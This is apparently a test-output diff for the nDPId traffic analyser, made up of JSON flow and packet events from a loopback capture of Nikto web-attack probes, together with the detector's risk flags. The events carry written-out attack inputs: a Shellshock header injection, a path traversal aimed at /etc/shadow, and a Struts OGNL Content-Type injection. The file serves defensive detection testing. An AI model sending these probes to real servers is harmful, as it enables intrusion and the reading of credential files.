00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="} -01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} +01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"} 